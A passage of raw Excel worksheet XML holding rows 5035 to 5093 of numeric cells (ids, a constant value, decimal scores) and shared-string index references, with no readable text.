        <v>5592</v>
      </c>
      <c r="G5035" t="s">
        <v>9954</v>
      </c>
      <c r="H5035" t="s">
        <v>9955</v>
      </c>
    </row>
    <row r="5036" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5036" s="1">
        <v>5034</v>
      </c>
      <c r="B5036">
        <v>2245</v>
      </c>
      <c r="C5036">
        <v>2245</v>
      </c>
      <c r="D5036">
        <v>2</v>
      </c>
      <c r="E5036">
        <v>0.86890000104904175</v>
      </c>
      <c r="F5036" t="s">
        <v>5592</v>
      </c>
      <c r="G5036" t="s">
        <v>9956</v>
      </c>
      <c r="H5036" t="s">
        <v>9957</v>
      </c>
    </row>
    <row r="5037" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5037" s="1">
        <v>5035</v>
      </c>
      <c r="B5037">
        <v>6858</v>
      </c>
      <c r="C5037">
        <v>6858</v>
      </c>
      <c r="D5037">
        <v>2</v>
      </c>
      <c r="E5037">
        <v>0.55970001220703125</v>
      </c>
      <c r="F5037" t="s">
        <v>5592</v>
      </c>
      <c r="G5037" t="s">
        <v>9958</v>
      </c>
      <c r="H5037" t="s">
        <v>9959</v>
      </c>
    </row>
    <row r="5038" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5038" s="1">
        <v>5036</v>
      </c>
      <c r="B5038">
        <v>2242</v>
      </c>
      <c r="C5038">
        <v>2242</v>
      </c>
      <c r="D5038">
        <v>2</v>
      </c>
      <c r="E5038">
        <v>0.6492999792098999</v>
      </c>
      <c r="F5038" t="s">
        <v>5592</v>
      </c>
      <c r="G5038" t="s">
        <v>9960</v>
      </c>
      <c r="H5038" t="s">
        <v>9961</v>
      </c>
    </row>
    <row r="5039" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5039" s="1">
        <v>5037</v>
      </c>
      <c r="B5039">
        <v>6920</v>
      </c>
      <c r="C5039">
        <v>6920</v>
      </c>
      <c r="D5039">
        <v>2</v>
      </c>
      <c r="E5039">
        <v>0.98470002412796021</v>
      </c>
      <c r="F5039" t="s">
        <v>5592</v>
      </c>
      <c r="G5039" t="s">
        <v>9962</v>
      </c>
      <c r="H5039" t="s">
        <v>9963</v>
      </c>
    </row>
    <row r="5040" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5040" s="1">
        <v>5038</v>
      </c>
      <c r="B5040">
        <v>2232</v>
      </c>
      <c r="C5040">
        <v>2232</v>
      </c>
      <c r="D5040">
        <v>2</v>
      </c>
      <c r="E5040">
        <v>0.63220000267028809</v>
      </c>
      <c r="F5040" t="s">
        <v>5592</v>
      </c>
      <c r="G5040" t="s">
        <v>9964</v>
      </c>
      <c r="H5040" t="s">
        <v>9965</v>
      </c>
    </row>
    <row r="5041" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5041" s="1">
        <v>5039</v>
      </c>
      <c r="B5041">
        <v>2230</v>
      </c>
      <c r="C5041">
        <v>2230</v>
      </c>
      <c r="D5041">
        <v>2</v>
      </c>
      <c r="E5041">
        <v>0.99629998207092285</v>
      </c>
      <c r="F5041" t="s">
        <v>5592</v>
      </c>
      <c r="G5041" t="s">
        <v>9966</v>
      </c>
      <c r="H5041" t="s">
        <v>9967</v>
      </c>
    </row>
    <row r="5042" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5042" s="1">
        <v>5040</v>
      </c>
      <c r="B5042">
        <v>6860</v>
      </c>
      <c r="C5042">
        <v>6860</v>
      </c>
      <c r="D5042">
        <v>2</v>
      </c>
      <c r="E5042">
        <v>0.94650000333786011</v>
      </c>
      <c r="F5042" t="s">
        <v>5592</v>
      </c>
      <c r="G5042" t="s">
        <v>9968</v>
      </c>
      <c r="H5042" t="s">
        <v>9969</v>
      </c>
    </row>
    <row r="5043" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5043" s="1">
        <v>5041</v>
      </c>
      <c r="B5043">
        <v>2525</v>
      </c>
      <c r="C5043">
        <v>2525</v>
      </c>
      <c r="D5043">
        <v>2</v>
      </c>
      <c r="E5043">
        <v>0.88550001382827759</v>
      </c>
      <c r="F5043" t="s">
        <v>5592</v>
      </c>
      <c r="G5043" t="s">
        <v>9970</v>
      </c>
      <c r="H5043" t="s">
        <v>9971</v>
      </c>
    </row>
    <row r="5044" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5044" s="1">
        <v>5042</v>
      </c>
      <c r="B5044">
        <v>6818</v>
      </c>
      <c r="C5044">
        <v>6818</v>
      </c>
      <c r="D5044">
        <v>2</v>
      </c>
      <c r="E5044">
        <v>0.6478000283241272</v>
      </c>
      <c r="F5044" t="s">
        <v>5592</v>
      </c>
      <c r="G5044" t="s">
        <v>9972</v>
      </c>
      <c r="H5044" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="5045" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5045" s="1">
        <v>5043</v>
      </c>
      <c r="B5045">
        <v>2593</v>
      </c>
      <c r="C5045">
        <v>2593</v>
      </c>
      <c r="D5045">
        <v>2</v>
      </c>
      <c r="E5045">
        <v>0.99000000953674316</v>
      </c>
      <c r="F5045" t="s">
        <v>5592</v>
      </c>
      <c r="G5045" t="s">
        <v>9974</v>
      </c>
      <c r="H5045" t="s">
        <v>9975</v>
      </c>
    </row>
    <row r="5046" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5046" s="1">
        <v>5044</v>
      </c>
      <c r="B5046">
        <v>6769</v>
      </c>
      <c r="C5046">
        <v>6769</v>
      </c>
      <c r="D5046">
        <v>2</v>
      </c>
      <c r="E5046">
        <v>0.98110002279281616</v>
      </c>
      <c r="F5046" t="s">
        <v>5592</v>
      </c>
      <c r="G5046" t="s">
        <v>9976</v>
      </c>
      <c r="H5046" t="s">
        <v>9977</v>
      </c>
    </row>
    <row r="5047" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5047" s="1">
        <v>5045</v>
      </c>
      <c r="B5047">
        <v>2599</v>
      </c>
      <c r="C5047">
        <v>2599</v>
      </c>
      <c r="D5047">
        <v>2</v>
      </c>
      <c r="E5047">
        <v>0.7807999849319458</v>
      </c>
      <c r="F5047" t="s">
        <v>5592</v>
      </c>
      <c r="G5047" t="s">
        <v>9978</v>
      </c>
      <c r="H5047" t="s">
        <v>9979</v>
      </c>
    </row>
    <row r="5048" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5048" s="1">
        <v>5046</v>
      </c>
      <c r="B5048">
        <v>2598</v>
      </c>
      <c r="C5048">
        <v>2598</v>
      </c>
      <c r="D5048">
        <v>2</v>
      </c>
      <c r="E5048">
        <v>0.99720001220703125</v>
      </c>
      <c r="F5048" t="s">
        <v>5592</v>
      </c>
      <c r="G5048" t="s">
        <v>9980</v>
      </c>
      <c r="H5048" t="s">
        <v>9981</v>
      </c>
    </row>
    <row r="5049" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5049" s="1">
        <v>5047</v>
      </c>
      <c r="B5049">
        <v>2596</v>
      </c>
      <c r="C5049">
        <v>2596</v>
      </c>
      <c r="D5049">
        <v>2</v>
      </c>
      <c r="E5049">
        <v>0.99900001287460327</v>
      </c>
      <c r="F5049" t="s">
        <v>5592</v>
      </c>
      <c r="G5049" t="s">
        <v>9982</v>
      </c>
      <c r="H5049" t="s">
        <v>9983</v>
      </c>
    </row>
    <row r="5050" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5050" s="1">
        <v>5048</v>
      </c>
      <c r="B5050">
        <v>2590</v>
      </c>
      <c r="C5050">
        <v>2590</v>
      </c>
      <c r="D5050">
        <v>2</v>
      </c>
      <c r="E5050">
        <v>0.93970000743865967</v>
      </c>
      <c r="F5050" t="s">
        <v>5592</v>
      </c>
      <c r="G5050" t="s">
        <v>9984</v>
      </c>
      <c r="H5050" t="s">
        <v>9985</v>
      </c>
    </row>
    <row r="5051" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5051" s="1">
        <v>5049</v>
      </c>
      <c r="B5051">
        <v>6774</v>
      </c>
      <c r="C5051">
        <v>6774</v>
      </c>
      <c r="D5051">
        <v>2</v>
      </c>
      <c r="E5051">
        <v>0.99930000305175781</v>
      </c>
      <c r="F5051" t="s">
        <v>5592</v>
      </c>
      <c r="G5051" t="s">
        <v>9986</v>
      </c>
      <c r="H5051" t="s">
        <v>9987</v>
      </c>
    </row>
    <row r="5052" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5052" s="1">
        <v>5050</v>
      </c>
      <c r="B5052">
        <v>6775</v>
      </c>
      <c r="C5052">
        <v>6775</v>
      </c>
      <c r="D5052">
        <v>2</v>
      </c>
      <c r="E5052">
        <v>0.43250000476837158</v>
      </c>
      <c r="F5052" t="s">
        <v>5592</v>
      </c>
      <c r="G5052" t="s">
        <v>9988</v>
      </c>
      <c r="H5052" t="s">
        <v>9989</v>
      </c>
    </row>
    <row r="5053" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5053" s="1">
        <v>5051</v>
      </c>
      <c r="B5053">
        <v>2127</v>
      </c>
      <c r="C5053">
        <v>2127</v>
      </c>
      <c r="D5053">
        <v>2</v>
      </c>
      <c r="E5053">
        <v>0.80390000343322754</v>
      </c>
      <c r="F5053" t="s">
        <v>5592</v>
      </c>
      <c r="G5053" t="s">
        <v>9990</v>
      </c>
      <c r="H5053" t="s">
        <v>9991</v>
      </c>
    </row>
    <row r="5054" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5054" s="1">
        <v>5052</v>
      </c>
      <c r="B5054">
        <v>2579</v>
      </c>
      <c r="C5054">
        <v>2579</v>
      </c>
      <c r="D5054">
        <v>2</v>
      </c>
      <c r="E5054">
        <v>0.99580001831054688</v>
      </c>
      <c r="F5054" t="s">
        <v>5592</v>
      </c>
      <c r="G5054" t="s">
        <v>9992</v>
      </c>
      <c r="H5054" t="s">
        <v>9993</v>
      </c>
    </row>
    <row r="5055" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5055" s="1">
        <v>5053</v>
      </c>
      <c r="B5055">
        <v>2578</v>
      </c>
      <c r="C5055">
        <v>2578</v>
      </c>
      <c r="D5055">
        <v>2</v>
      </c>
      <c r="E5055">
        <v>0.60799998044967651</v>
      </c>
      <c r="F5055" t="s">
        <v>5592</v>
      </c>
      <c r="G5055" t="s">
        <v>9994</v>
      </c>
      <c r="H5055" t="s">
        <v>9995</v>
      </c>
    </row>
    <row r="5056" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5056" s="1">
        <v>5054</v>
      </c>
      <c r="B5056">
        <v>2128</v>
      </c>
      <c r="C5056">
        <v>2128</v>
      </c>
      <c r="D5056">
        <v>2</v>
      </c>
      <c r="E5056">
        <v>0.49439999461174011</v>
      </c>
      <c r="F5056" t="s">
        <v>5592</v>
      </c>
      <c r="G5056" t="s">
        <v>9996</v>
      </c>
      <c r="H5056" t="s">
        <v>9997</v>
      </c>
    </row>
    <row r="5057" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5057" s="1">
        <v>5055</v>
      </c>
      <c r="B5057">
        <v>2577</v>
      </c>
      <c r="C5057">
        <v>2577</v>
      </c>
      <c r="D5057">
        <v>2</v>
      </c>
      <c r="E5057">
        <v>0.95599997043609619</v>
      </c>
      <c r="F5057" t="s">
        <v>5592</v>
      </c>
      <c r="G5057" t="s">
        <v>9998</v>
      </c>
      <c r="H5057" t="s">
        <v>9999</v>
      </c>
    </row>
    <row r="5058" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5058" s="1">
        <v>5056</v>
      </c>
      <c r="B5058">
        <v>2576</v>
      </c>
      <c r="C5058">
        <v>2576</v>
      </c>
      <c r="D5058">
        <v>2</v>
      </c>
      <c r="E5058">
        <v>0.65679997205734253</v>
      </c>
      <c r="F5058" t="s">
        <v>5592</v>
      </c>
      <c r="G5058" t="s">
        <v>10000</v>
      </c>
      <c r="H5058" t="s">
        <v>10001</v>
      </c>
    </row>
    <row r="5059" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5059" s="1">
        <v>5057</v>
      </c>
      <c r="B5059">
        <v>2575</v>
      </c>
      <c r="C5059">
        <v>2575</v>
      </c>
      <c r="D5059">
        <v>2</v>
      </c>
      <c r="E5059">
        <v>0.96079999208450317</v>
      </c>
      <c r="F5059" t="s">
        <v>5592</v>
      </c>
      <c r="G5059" t="s">
        <v>10002</v>
      </c>
      <c r="H5059" t="s">
        <v>10003</v>
      </c>
    </row>
    <row r="5060" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5060" s="1">
        <v>5058</v>
      </c>
      <c r="B5060">
        <v>2574</v>
      </c>
      <c r="C5060">
        <v>2574</v>
      </c>
      <c r="D5060">
        <v>2</v>
      </c>
      <c r="E5060">
        <v>0.87599998712539673</v>
      </c>
      <c r="F5060" t="s">
        <v>5592</v>
      </c>
      <c r="G5060" t="s">
        <v>10004</v>
      </c>
      <c r="H5060" t="s">
        <v>10005</v>
      </c>
    </row>
    <row r="5061" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5061" s="1">
        <v>5059</v>
      </c>
      <c r="B5061">
        <v>6979</v>
      </c>
      <c r="C5061">
        <v>6979</v>
      </c>
      <c r="D5061">
        <v>2</v>
      </c>
      <c r="E5061">
        <v>0.57260000705718994</v>
      </c>
      <c r="F5061" t="s">
        <v>5592</v>
      </c>
      <c r="G5061" t="s">
        <v>10006</v>
      </c>
      <c r="H5061" t="s">
        <v>10007</v>
      </c>
    </row>
    <row r="5062" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5062" s="1">
        <v>5060</v>
      </c>
      <c r="B5062">
        <v>6776</v>
      </c>
      <c r="C5062">
        <v>6776</v>
      </c>
      <c r="D5062">
        <v>2</v>
      </c>
      <c r="E5062">
        <v>0.71329998970031738</v>
      </c>
      <c r="F5062" t="s">
        <v>5592</v>
      </c>
      <c r="G5062" t="s">
        <v>10008</v>
      </c>
      <c r="H5062" t="s">
        <v>10009</v>
      </c>
    </row>
    <row r="5063" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5063" s="1">
        <v>5061</v>
      </c>
      <c r="B5063">
        <v>2572</v>
      </c>
      <c r="C5063">
        <v>2572</v>
      </c>
      <c r="D5063">
        <v>2</v>
      </c>
      <c r="E5063">
        <v>0.99709999561309814</v>
      </c>
      <c r="F5063" t="s">
        <v>5592</v>
      </c>
      <c r="G5063" t="s">
        <v>10010</v>
      </c>
      <c r="H5063" t="s">
        <v>10011</v>
      </c>
    </row>
    <row r="5064" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5064" s="1">
        <v>5062</v>
      </c>
      <c r="B5064">
        <v>6778</v>
      </c>
      <c r="C5064">
        <v>6778</v>
      </c>
      <c r="D5064">
        <v>2</v>
      </c>
      <c r="E5064">
        <v>0.50789999961853027</v>
      </c>
      <c r="F5064" t="s">
        <v>5592</v>
      </c>
      <c r="G5064" t="s">
        <v>10012</v>
      </c>
      <c r="H5064" t="s">
        <v>10013</v>
      </c>
    </row>
    <row r="5065" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5065" s="1">
        <v>5063</v>
      </c>
      <c r="B5065">
        <v>6779</v>
      </c>
      <c r="C5065">
        <v>6779</v>
      </c>
      <c r="D5065">
        <v>2</v>
      </c>
      <c r="E5065">
        <v>0.65369999408721924</v>
      </c>
      <c r="F5065" t="s">
        <v>5592</v>
      </c>
      <c r="G5065" t="s">
        <v>10014</v>
      </c>
      <c r="H5065" t="s">
        <v>10015</v>
      </c>
    </row>
    <row r="5066" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5066" s="1">
        <v>5064</v>
      </c>
      <c r="B5066">
        <v>2554</v>
      </c>
      <c r="C5066">
        <v>2554</v>
      </c>
      <c r="D5066">
        <v>2</v>
      </c>
      <c r="E5066">
        <v>0.84189999103546143</v>
      </c>
      <c r="F5066" t="s">
        <v>5592</v>
      </c>
      <c r="G5066" t="s">
        <v>10016</v>
      </c>
      <c r="H5066" t="s">
        <v>10017</v>
      </c>
    </row>
    <row r="5067" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5067" s="1">
        <v>5065</v>
      </c>
      <c r="B5067">
        <v>2553</v>
      </c>
      <c r="C5067">
        <v>2553</v>
      </c>
      <c r="D5067">
        <v>2</v>
      </c>
      <c r="E5067">
        <v>0.6315000057220459</v>
      </c>
      <c r="F5067" t="s">
        <v>5592</v>
      </c>
      <c r="G5067" t="s">
        <v>10018</v>
      </c>
      <c r="H5067" t="s">
        <v>10019</v>
      </c>
    </row>
    <row r="5068" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5068" s="1">
        <v>5066</v>
      </c>
      <c r="B5068">
        <v>2549</v>
      </c>
      <c r="C5068">
        <v>2549</v>
      </c>
      <c r="D5068">
        <v>2</v>
      </c>
      <c r="E5068">
        <v>0.52230000495910645</v>
      </c>
      <c r="F5068" t="s">
        <v>5592</v>
      </c>
      <c r="G5068" t="s">
        <v>10020</v>
      </c>
      <c r="H5068" t="s">
        <v>10021</v>
      </c>
    </row>
    <row r="5069" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5069" s="1">
        <v>5067</v>
      </c>
      <c r="B5069">
        <v>6784</v>
      </c>
      <c r="C5069">
        <v>6784</v>
      </c>
      <c r="D5069">
        <v>2</v>
      </c>
      <c r="E5069">
        <v>0.58710002899169922</v>
      </c>
      <c r="F5069" t="s">
        <v>5592</v>
      </c>
      <c r="G5069" t="s">
        <v>10022</v>
      </c>
      <c r="H5069" t="s">
        <v>10023</v>
      </c>
    </row>
    <row r="5070" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5070" s="1">
        <v>5068</v>
      </c>
      <c r="B5070">
        <v>2547</v>
      </c>
      <c r="C5070">
        <v>2547</v>
      </c>
      <c r="D5070">
        <v>2</v>
      </c>
      <c r="E5070">
        <v>0.60619997978210449</v>
      </c>
      <c r="F5070" t="s">
        <v>5592</v>
      </c>
      <c r="G5070" t="s">
        <v>10024</v>
      </c>
      <c r="H5070" t="s">
        <v>10025</v>
      </c>
    </row>
    <row r="5071" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5071" s="1">
        <v>5069</v>
      </c>
      <c r="B5071">
        <v>2141</v>
      </c>
      <c r="C5071">
        <v>2141</v>
      </c>
      <c r="D5071">
        <v>2</v>
      </c>
      <c r="E5071">
        <v>0.42429998517036438</v>
      </c>
      <c r="F5071" t="s">
        <v>5592</v>
      </c>
      <c r="G5071" t="s">
        <v>10026</v>
      </c>
      <c r="H5071" t="s">
        <v>10027</v>
      </c>
    </row>
    <row r="5072" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5072" s="1">
        <v>5070</v>
      </c>
      <c r="B5072">
        <v>2546</v>
      </c>
      <c r="C5072">
        <v>2546</v>
      </c>
      <c r="D5072">
        <v>2</v>
      </c>
      <c r="E5072">
        <v>0.43380001187324518</v>
      </c>
      <c r="F5072" t="s">
        <v>5592</v>
      </c>
      <c r="G5072" t="s">
        <v>10028</v>
      </c>
      <c r="H5072" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="5073" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5073" s="1">
        <v>5071</v>
      </c>
      <c r="B5073">
        <v>2126</v>
      </c>
      <c r="C5073">
        <v>2126</v>
      </c>
      <c r="D5073">
        <v>2</v>
      </c>
      <c r="E5073">
        <v>0.95740002393722534</v>
      </c>
      <c r="F5073" t="s">
        <v>5592</v>
      </c>
      <c r="G5073" t="s">
        <v>10030</v>
      </c>
      <c r="H5073" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="5074" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5074" s="1">
        <v>5072</v>
      </c>
      <c r="B5074">
        <v>2603</v>
      </c>
      <c r="C5074">
        <v>2603</v>
      </c>
      <c r="D5074">
        <v>2</v>
      </c>
      <c r="E5074">
        <v>0.67159998416900635</v>
      </c>
      <c r="F5074" t="s">
        <v>5592</v>
      </c>
      <c r="G5074" t="s">
        <v>10032</v>
      </c>
      <c r="H5074" t="s">
        <v>7860</v>
      </c>
    </row>
    <row r="5075" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5075" s="1">
        <v>5073</v>
      </c>
      <c r="B5075">
        <v>2604</v>
      </c>
      <c r="C5075">
        <v>2604</v>
      </c>
      <c r="D5075">
        <v>2</v>
      </c>
      <c r="E5075">
        <v>0.99570000171661377</v>
      </c>
      <c r="F5075" t="s">
        <v>5592</v>
      </c>
      <c r="G5075" t="s">
        <v>10033</v>
      </c>
      <c r="H5075" t="s">
        <v>10034</v>
      </c>
    </row>
    <row r="5076" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5076" s="1">
        <v>5074</v>
      </c>
      <c r="B5076">
        <v>6765</v>
      </c>
      <c r="C5076">
        <v>6765</v>
      </c>
      <c r="D5076">
        <v>2</v>
      </c>
      <c r="E5076">
        <v>0.99959999322891235</v>
      </c>
      <c r="F5076" t="s">
        <v>5592</v>
      </c>
      <c r="G5076" t="s">
        <v>10035</v>
      </c>
      <c r="H5076" t="s">
        <v>10036</v>
      </c>
    </row>
    <row r="5077" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5077" s="1">
        <v>5075</v>
      </c>
      <c r="B5077">
        <v>2641</v>
      </c>
      <c r="C5077">
        <v>2641</v>
      </c>
      <c r="D5077">
        <v>2</v>
      </c>
      <c r="E5077">
        <v>0.89490002393722534</v>
      </c>
      <c r="F5077" t="s">
        <v>5592</v>
      </c>
      <c r="G5077" t="s">
        <v>10037</v>
      </c>
      <c r="H5077" t="s">
        <v>10038</v>
      </c>
    </row>
    <row r="5078" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5078" s="1">
        <v>5076</v>
      </c>
      <c r="B5078">
        <v>2094</v>
      </c>
      <c r="C5078">
        <v>2094</v>
      </c>
      <c r="D5078">
        <v>2</v>
      </c>
      <c r="E5078">
        <v>0.92220002412796021</v>
      </c>
      <c r="F5078" t="s">
        <v>5592</v>
      </c>
      <c r="G5078" t="s">
        <v>10039</v>
      </c>
      <c r="H5078" t="s">
        <v>10040</v>
      </c>
    </row>
    <row r="5079" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5079" s="1">
        <v>5077</v>
      </c>
      <c r="B5079">
        <v>2638</v>
      </c>
      <c r="C5079">
        <v>2638</v>
      </c>
      <c r="D5079">
        <v>2</v>
      </c>
      <c r="E5079">
        <v>0.82569998502731323</v>
      </c>
      <c r="F5079" t="s">
        <v>5592</v>
      </c>
      <c r="G5079" t="s">
        <v>10041</v>
      </c>
      <c r="H5079" t="s">
        <v>10042</v>
      </c>
    </row>
    <row r="5080" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5080" s="1">
        <v>5078</v>
      </c>
      <c r="B5080">
        <v>2095</v>
      </c>
      <c r="C5080">
        <v>2095</v>
      </c>
      <c r="D5080">
        <v>2</v>
      </c>
      <c r="E5080">
        <v>0.92229998111724854</v>
      </c>
      <c r="F5080" t="s">
        <v>5592</v>
      </c>
      <c r="G5080" t="s">
        <v>10043</v>
      </c>
      <c r="H5080" t="s">
        <v>10040</v>
      </c>
    </row>
    <row r="5081" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5081" s="1">
        <v>5079</v>
      </c>
      <c r="B5081">
        <v>2637</v>
      </c>
      <c r="C5081">
        <v>2637</v>
      </c>
      <c r="D5081">
        <v>2</v>
      </c>
      <c r="E5081">
        <v>0.57080000638961792</v>
      </c>
      <c r="F5081" t="s">
        <v>5592</v>
      </c>
      <c r="G5081" t="s">
        <v>10044</v>
      </c>
      <c r="H5081" t="s">
        <v>10045</v>
      </c>
    </row>
    <row r="5082" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5082" s="1">
        <v>5080</v>
      </c>
      <c r="B5082">
        <v>6755</v>
      </c>
      <c r="C5082">
        <v>6755</v>
      </c>
      <c r="D5082">
        <v>2</v>
      </c>
      <c r="E5082">
        <v>0.6194000244140625</v>
      </c>
      <c r="F5082" t="s">
        <v>5592</v>
      </c>
      <c r="G5082" t="s">
        <v>10046</v>
      </c>
      <c r="H5082" t="s">
        <v>10047</v>
      </c>
    </row>
    <row r="5083" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5083" s="1">
        <v>5081</v>
      </c>
      <c r="B5083">
        <v>2096</v>
      </c>
      <c r="C5083">
        <v>2096</v>
      </c>
      <c r="D5083">
        <v>2</v>
      </c>
      <c r="E5083">
        <v>0.64440000057220459</v>
      </c>
      <c r="F5083" t="s">
        <v>5592</v>
      </c>
      <c r="G5083" t="s">
        <v>10048</v>
      </c>
      <c r="H5083" t="s">
        <v>10049</v>
      </c>
    </row>
    <row r="5084" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5084" s="1">
        <v>5082</v>
      </c>
      <c r="B5084">
        <v>2097</v>
      </c>
      <c r="C5084">
        <v>2097</v>
      </c>
      <c r="D5084">
        <v>2</v>
      </c>
      <c r="E5084">
        <v>0.99800002574920654</v>
      </c>
      <c r="F5084" t="s">
        <v>5592</v>
      </c>
      <c r="G5084" t="s">
        <v>10050</v>
      </c>
      <c r="H5084" t="s">
        <v>10051</v>
      </c>
    </row>
    <row r="5085" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5085" s="1">
        <v>5083</v>
      </c>
      <c r="B5085">
        <v>2098</v>
      </c>
      <c r="C5085">
        <v>2098</v>
      </c>
      <c r="D5085">
        <v>2</v>
      </c>
      <c r="E5085">
        <v>0.99709999561309814</v>
      </c>
      <c r="F5085" t="s">
        <v>5592</v>
      </c>
      <c r="G5085" t="s">
        <v>10052</v>
      </c>
      <c r="H5085" t="s">
        <v>10053</v>
      </c>
    </row>
    <row r="5086" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5086" s="1">
        <v>5084</v>
      </c>
      <c r="B5086">
        <v>2099</v>
      </c>
      <c r="C5086">
        <v>2099</v>
      </c>
      <c r="D5086">
        <v>2</v>
      </c>
      <c r="E5086">
        <v>0.99290001392364502</v>
      </c>
      <c r="F5086" t="s">
        <v>5592</v>
      </c>
      <c r="G5086" t="s">
        <v>10054</v>
      </c>
      <c r="H5086" t="s">
        <v>10055</v>
      </c>
    </row>
    <row r="5087" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5087" s="1">
        <v>5085</v>
      </c>
      <c r="B5087">
        <v>2100</v>
      </c>
      <c r="C5087">
        <v>2100</v>
      </c>
      <c r="D5087">
        <v>2</v>
      </c>
      <c r="E5087">
        <v>0.98600000143051147</v>
      </c>
      <c r="F5087" t="s">
        <v>5592</v>
      </c>
      <c r="G5087" t="s">
        <v>10056</v>
      </c>
      <c r="H5087" t="s">
        <v>10057</v>
      </c>
    </row>
    <row r="5088" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5088" s="1">
        <v>5086</v>
      </c>
      <c r="B5088">
        <v>6759</v>
      </c>
      <c r="C5088">
        <v>6759</v>
      </c>
      <c r="D5088">
        <v>2</v>
      </c>
      <c r="E5088">
        <v>0.56440001726150513</v>
      </c>
      <c r="F5088" t="s">
        <v>5592</v>
      </c>
      <c r="G5088" t="s">
        <v>10058</v>
      </c>
      <c r="H5088" t="s">
        <v>10059</v>
      </c>
    </row>
    <row r="5089" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5089" s="1">
        <v>5087</v>
      </c>
      <c r="B5089">
        <v>2101</v>
      </c>
      <c r="C5089">
        <v>2101</v>
      </c>
      <c r="D5089">
        <v>2</v>
      </c>
      <c r="E5089">
        <v>0.99750000238418579</v>
      </c>
      <c r="F5089" t="s">
        <v>5592</v>
      </c>
      <c r="G5089" t="s">
        <v>10060</v>
      </c>
      <c r="H5089" t="s">
        <v>10061</v>
      </c>
    </row>
    <row r="5090" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5090" s="1">
        <v>5088</v>
      </c>
      <c r="B5090">
        <v>2543</v>
      </c>
      <c r="C5090">
        <v>2543</v>
      </c>
      <c r="D5090">
        <v>2</v>
      </c>
      <c r="E5090">
        <v>0.819100022315979</v>
      </c>
      <c r="F5090" t="s">
        <v>5592</v>
      </c>
      <c r="G5090" t="s">
        <v>10062</v>
      </c>
      <c r="H5090" t="s">
        <v>10063</v>
      </c>
    </row>
    <row r="5091" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5091" s="1">
        <v>5089</v>
      </c>
      <c r="B5091">
        <v>2627</v>
      </c>
      <c r="C5091">
        <v>2627</v>
      </c>
      <c r="D5091">
        <v>2</v>
      </c>
      <c r="E5091">
        <v>0.6315000057220459</v>
      </c>
      <c r="F5091" t="s">
        <v>5592</v>
      </c>
      <c r="G5091" t="s">
        <v>10064</v>
      </c>
      <c r="H5091" t="s">
        <v>10065</v>
      </c>
    </row>
    <row r="5092" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5092" s="1">
        <v>5090</v>
      </c>
      <c r="B5092">
        <v>2622</v>
      </c>
      <c r="C5092">
        <v>2622</v>
      </c>
      <c r="D5092">
        <v>2</v>
      </c>
      <c r="E5092">
        <v>0.58969998359680176</v>
      </c>
      <c r="F5092" t="s">
        <v>5592</v>
      </c>
      <c r="G5092" t="s">
        <v>10066</v>
      </c>
      <c r="H5092" t="s">
        <v>10067</v>
      </c>
    </row>
    <row r="5093" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5093" s="1">
        <v>5091</v>
      </c>
      <c r="B5093">
        <v>2107</v>
      </c>
      <c r="C5093">
        <v>2107</v>
      </c>
      <c r="D5093">
        <v>2</v>
      </c>
      <c r="E5093">
        <v>0.52329999208450317</v>
      </c>
      <c r="F5093" t="s">
        <v>5592</v>
      </c>
      <c r="G5093" t="s">
        <v>10068</v>
      </c>
      <c r="H5093" t="s">
        <v>10069</v>
      </c>
    </row>
